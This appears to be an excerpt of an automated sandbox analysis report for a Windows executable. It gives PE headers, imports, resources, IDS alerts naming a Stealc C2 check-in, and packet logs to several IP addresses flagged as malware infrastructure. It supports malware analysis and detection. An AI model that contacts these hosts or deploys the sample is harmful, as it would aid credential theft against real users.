mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004547C8h], 00010001h
mov eax, dword ptr [00454880h]
mov dword ptr [0045477Ch], eax
mov dword ptr [00454770h], C0000409h
mov dword ptr [00454774h], 00000001h
mov eax, dword ptr [00452004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00452008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000BCh]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x507f4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42e000	0x12210	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x504b8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4f000	0x168	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4dbac	0x4dc00	102dd3177a92bf189df26ab69b11048c	False	0.8531733571141479	data	7.556532829734777	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4f000	0x204c	0x2200	f7f415224bc74a016c4ec2bba5db444f	False	0.3604090073529412	data	5.425223093661499	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x52000	0x3db0d8	0x6c00	b3d3247418ad7e0526fd869ac0ab157a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x42e000	0x12210	0x12400	a953a7b6da78bcb1f972c2428a3c3fff	False	0.5140999571917808	data	5.447006608617254	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x4391a8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x4392d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x43b8a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_ICON	0x42e6f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkmen	Turkmenistan	0.357409381663113
RT_ICON	0x42f598	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkmen	Turkmenistan	0.5058664259927798
RT_ICON	0x42fe40	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkmen	Turkmenistan	0.5829493087557603
RT_ICON	0x430508	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkmen	Turkmenistan	0.6184971098265896
RT_ICON	0x430a70	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkmen	Turkmenistan	0.35201688555347094
RT_ICON	0x431b18	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkmen	Turkmenistan	0.3471311475409836
RT_ICON	0x4324a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkmen	Turkmenistan	0.399822695035461
RT_ICON	0x432970	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.8198294243070362
RT_ICON	0x433818	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.8655234657039711
RT_ICON	0x4340c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.7816820276497696
RT_ICON	0x434788	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.7933526011560693
RT_ICON	0x434cf0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.8035269709543569
RT_ICON	0x437298	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.8297373358348968
RT_ICON	0x438340	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.8442622950819673
RT_ICON	0x438cc8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.8590425531914894
RT_DIALOG	0x43c920	0x82	data			0.7615384615384615
RT_STRING	0x43c9a8	0x42c	data			0.45318352059925093
RT_STRING	0x43cdd8	0x122	data			0.5206896551724138
RT_STRING	0x43cf00	0x7c0	data			0.4264112903225806
RT_STRING	0x43d6c0	0x768	data			0.4272151898734177
RT_STRING	0x43de28	0x8e4	data			0.4147627416520211
RT_STRING	0x43e710	0x728	data			0.4268558951965066
RT_STRING	0x43ee38	0x78a	data			0.4227979274611399
RT_STRING	0x43f5c8	0x79a	data			0.41778006166495374
RT_STRING	0x43fd68	0x4a6	data			0.4588235294117647
RT_GROUP_CURSOR	0x43b880	0x22	data			1.088235294117647
RT_GROUP_CURSOR	0x43c750	0x14	data			1.25
RT_GROUP_ICON	0x439130	0x76	data	Turkmen	Turkmenistan	0.6779661016949152
RT_GROUP_ICON	0x432908	0x68	data	Turkmen	Turkmenistan	0.7115384615384616
RT_VERSION	0x43c768	0x1b8	COM executable for DOS			0.5681818181818182

Imports

DLL	Import
KERNEL32.dll	UpdateResourceA, DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, SetDefaultCommConfigW, GetEnvironmentStringsW, SetComputerNameW, SetEvent, GetModuleHandleW, GetCommandLineA, SetProcessPriorityBoost, GlobalAlloc, GetConsoleAliasExesLengthW, GetFileAttributesA, GetTimeFormatW, GetConsoleAliasW, GetModuleFileNameW, SetLastError, GetProcAddress, WriteConsoleOutputW, GetAtomNameA, LoadLibraryA, Process32Next, RegisterWaitForSingleObject, AddAtomA, FoldStringA, GetModuleHandleA, SetLocaleInfoW, OpenFileMappingW, BuildCommDCBA, WriteConsoleOutputAttribute, GetVersionExA, WriteProcessMemory, SetFileAttributesA, GetFileSize, LCMapStringW, LCMapStringA, GetLastError, HeapFree, HeapAlloc, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, GetStringTypeW
USER32.dll	GetClassLongW, GetMonitorInfoW
ADVAPI32.dll	EnumDependentServicesW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkmen	Turkmenistan

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-11T00:02:02.011974+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49735	172.67.179.207	443	TCP
2024-12-11T00:02:03.610287+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49737	176.113.115.19	80	TCP
2024-12-11T00:02:08.868986+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49738	92.255.57.89	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 00:02:00.096050024 CET	49735	443	192.168.2.4	172.67.179.207
Dec 11, 2024 00:02:00.096086025 CET	443	49735	172.67.179.207	192.168.2.4
Dec 11, 2024 00:02:00.096190929 CET	49735	443	192.168.2.4	172.67.179.207
Dec 11, 2024 00:02:00.128607988 CET	49735	443	192.168.2.4	172.67.179.207
Dec 11, 2024 00:02:00.128622055 CET	443	49735	172.67.179.207	192.168.2.4
Dec 11, 2024 00:02:01.351506948 CET	443	49735	172.67.179.207	192.168.2.4
Dec 11, 2024 00:02:01.351587057 CET	49735	443	192.168.2.4	172.67.179.207
Dec 11, 2024 00:02:01.401873112 CET	49735	443	192.168.2.4	172.67.179.207
Dec 11, 2024 00:02:01.401896000 CET	443	49735	172.67.179.207	192.168.2.4
Dec 11, 2024 00:02:01.402121067 CET	443	49735	172.67.179.207	192.168.2.4
Dec 11, 2024 00:02:01.405283928 CET	49735	443	192.168.2.4	172.67.179.207
Dec 11, 2024 00:02:01.408778906 CET	49735	443	192.168.2.4	172.67.179.207
Dec 11, 2024 00:02:01.455329895 CET	443	49735	172.67.179.207	192.168.2.4
Dec 11, 2024 00:02:02.012023926 CET	443	49735	172.67.179.207	192.168.2.4
Dec 11, 2024 00:02:02.012114048 CET	443	49735	172.67.179.207	192.168.2.4
Dec 11, 2024 00:02:02.012216091 CET	49735	443	192.168.2.4	172.67.179.207
Dec 11, 2024 00:02:02.013581991 CET	49735	443	192.168.2.4	172.67.179.207
Dec 11, 2024 00:02:02.013597965 CET	443	49735	172.67.179.207	192.168.2.4
Dec 11, 2024 00:02:02.013608932 CET	49735	443	192.168.2.4	172.67.179.207
Dec 11, 2024 00:02:02.013649940 CET	49735	443	192.168.2.4	172.67.179.207
Dec 11, 2024 00:02:02.129182100 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:02.248507023 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:02.248591900 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:02.248752117 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:02.368010998 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.610200882 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.610224009 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.610234022 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.610286951 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.610325098 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.610337019 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.610358000 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.610363960 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.610380888 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.610380888 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.610399961 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.610732079 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.610743999 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.610754967 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.610773087 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.610799074 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.729743958 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.729866028 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.729873896 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.729943037 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.733834982 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.733915091 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.734178066 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.734232903 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.802251101 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.802294016 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.802342892 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.802366972 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.804682016 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.804733038 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.804791927 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.804841042 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.813086033 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.813134909 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.813183069 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.813227892 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.821449995 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.821547031 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.821620941 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.829818010 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.829886913 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.829919100 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.829987049 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.838161945 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.838234901 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.838273048 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.838325977 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.846517086 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.846570969 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.846585035 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.846632004 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.854850054 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.854912043 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.854995012 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.855040073 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.863253117 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.863290071 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.863333941 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.863352060 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.871608973 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.871659040 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.871664047 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.871699095 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.879204988 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.879261017 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.879300117 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.879352093 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.886787891 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.886837006 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.886862040 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.886914968 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.964827061 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.964884043 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.964886904 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.964912891 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.994349003 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.994376898 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.994400978 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.994422913 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.996474028 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.996531010 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.997313976 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.997366905 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.997392893 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:03.997441053 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:03.999964952 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.000024080 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.000081062 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.000122070 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.004424095 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.004479885 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.004659891 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.004709959 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.008910894 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.008964062 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.009120941 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.009171009 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.013395071 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.013406038 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.013444901 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.017777920 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.017885923 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.017888069 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.017932892 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.022255898 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.022306919 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.022367954 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.022411108 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.026715040 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.026765108 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.026976109 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.027021885 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.031147003 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.031202078 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.031234980 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.031285048 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.035584927 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.035634995 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.035674095 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.035722971 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.040000916 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.040050030 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.040113926 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.040153027 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.044478893 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.044528008 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.044537067 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.044569969 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.048922062 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.048971891 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.048996925 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.049035072 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.053379059 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.053431988 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.053469896 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.053515911 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.057804108 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.057873964 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.057955980 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.058012962 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.062304020 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.062365055 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.062444925 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.062500000 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.066746950 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.066800117 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.066885948 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.066951990 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.071218967 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.071268082 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.071338892 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.071389914 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.081815004 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.081825972 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.081835985 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.081866026 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.081871033 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.081902027 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.081911087 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.084575891 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.084619045 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.084629059 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.084659100 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.088995934 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.089046955 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.089070082 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.089106083 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.156908035 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.156975031 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.157018900 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.157061100 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.158838034 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.158890963 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.189410925 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.189428091 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.189479113 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.189500093 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.191252947 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.191263914 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.191328049 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.194833994 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.194896936 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.196167946 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.196222067 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.196294069 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.196337938 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.199649096 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.199697018 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.199774027 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.199824095 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.202553988 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.202569008 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.202615023 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.202647924 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.206883907 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.206943989 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.207020998 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.207072020 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.210465908 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.210520029 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.210602999 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.210649967 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.214051008 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.214111090 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.214176893 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.214242935 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.214718103 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.214730978 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.214765072 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.214777946 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.214870930 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.214919090 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.215086937 CET	80	49737	176.113.115.19	192.168.2.4
